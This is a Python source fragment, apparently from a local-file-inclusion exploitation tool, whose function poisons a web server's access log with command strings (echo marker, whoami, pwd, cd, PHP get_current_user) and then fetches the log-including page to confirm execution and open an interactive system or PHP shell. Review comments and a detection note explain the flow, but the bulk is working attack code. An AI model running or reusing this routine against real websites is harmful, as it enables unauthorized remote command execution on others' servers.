(keyword, ologurl, logmain)
| 959 | exit() |
| 960 | |
def simpleGETorHEAD(keyword, ologurl, logmain):
    """Check whether a marker sent through send_access_log_cmd() shows up in the
    fetched page and, if it does, start the matching shell loop.

    Flow visible in this function:
      1. A random marker is sent as ``echo <marker>`` and a page is fetched.
      2. If access_control() accepts the response, ``whoami`` and ``pwd`` are
         sent and access_log_while() is entered with its last argument False.
      3. Otherwise ``path`` is sent; if checkIfWindows() accepts the output,
         ``whoami`` (falling back to the PHP call ``get_current_user();``) and
         ``cd`` are sent and access_log_while() is entered with its last
         argument True.
      4. A PHP-only marker (``echo '<marker>';`` with keyword + "_PHP") is then
         tried, and onlyPhpPrint() is called if it is reflected.

    Args:
        keyword: request keyword; printed in the status line and used to build
            the pattern handed to access_log_ext(). Presumably "GET" or "HEAD",
            going by the function name -- confirm against the caller.
        ologurl: URL fetched to read results back. Presumably the inclusion URL
            that renders the server's access log -- confirm against the caller.
        logmain: passed through unchanged to send_access_log_cmd() and
            access_log_while(); its meaning is not visible here.

    NOTE(review): the listing this was taken from lost its indentation. The
    nesting below is reconstructed; in particular, placing step 4 inside the
    ``else`` branch (rather than at function level) is an assumption to confirm
    against the upstream file.

    Detection note: every step is an ordinary HTTP request whose payload is a
    short command string (``echo <random>``, ``whoami``, ``pwd``, ``path``,
    ``cd``, ``get_current_user();``). The helper names suggest these end up in
    the web server's access log, so request entries carrying such strings,
    followed by a fetch of a page that includes the log, are the observable
    trace of this check.
    """
    randStr = generateRandom()
    send_access_log_cmd("echo %s" %randStr, logmain, keyword)

    # NOTE(review): `url` is neither a parameter nor a local, so it must come
    # from module scope; this branch also has no timeout, unlike the other
    # fetches in this function. verify=False turns off TLS certificate
    # validation for every fetch here.
    if(access_log_reverse):
        r = requests.get(url,headers=gen_headers, verify=False)
    else:
        r = requests.get(ologurl,headers=gen_headers,timeout=15, verify=False)

    resp = r.text
    print colored("\nTrying to inject the website using simple %s requests." %keyword, "white")

    # access_control() decides from the response, the keyword and the marker
    # whether the echoed marker came back (its exact test is not visible here).
    if(access_control(resp,keyword,randStr)):
        print "[+] The website seems to be vulnerable. Opening a System Shell..\n"
        time.sleep(1)
        cmd = ""  # not read again within this function

        # Collect the user name and working directory that are handed to the
        # shell loop below.
        send_access_log_cmd("whoami", logmain, keyword)
        whoami = cleanOutput(access_log_ext(ologurl, "\"%s /" %keyword), True)
        send_access_log_cmd("pwd", logmain, keyword)
        pwd = cleanOutput(access_log_ext(ologurl, "\"%s /" %keyword), True)

        access_log_while(whoami,logmain,pwd,ologurl,keyword,False)

    # -------------------------------------------------------------------------------------------
    else:
        # check if Windows operating system
        # ----------------------------------------------------- #
        send_access_log_cmd("path",logmain,keyword)
        path = cleanOutput(access_log_ext(ologurl, "\"%s /" %keyword), True)
        time.sleep(1)

        if(checkIfWindows(path)):
            # trying to get current Windows user by using 'whoami' command
            send_access_log_cmd("whoami", logmain, keyword)
            whoami = isUnknown(cleanOutput(access_log_ext(ologurl, "\"%s /" %keyword), True))

            # isUnknown() presumably returns a value containing "?" when the
            # output was unusable -- confirm against its definition.
            if("?" in whoami):
                # Try to get current_user using PHP function 'get_current_user()'
                send_access_log_cmd("get_current_user();", logmain, keyword+"_PHP")
                whoami = isUnknown(cleanOutput(access_log_ext(ologurl, "\"%s /" %keyword), True))

            # `cd` is sent here where the first branch sends `pwd`; the result
            # is passed on as the working directory.
            send_access_log_cmd("cd", logmain, keyword)
            pwd = cleanOutput(access_log_ext(ologurl, "\"%s /" %keyword), True)
            access_log_while(whoami,logmain,pwd,ologurl,keyword,True)

        # ----------------------------------------------------- #

        # Try to open an only PHP-based shell
        # A fresh marker is used so a stale reflection of the first one cannot
        # satisfy this second check.
        rand_str = generateRandom()

        send_access_log_cmd("echo '%s';" %rand_str,logmain,keyword+"_PHP")
        resp = (requests.get(ologurl,headers=gen_headers,timeout=15, verify=False)).text
        if(access_control(resp,keyword+"_PHP",rand_str)):
            print "[+] The website seems to be vulnerable. Opening a Shell.."
            time.sleep(1)
            onlyPhpPrint()
| 1018 |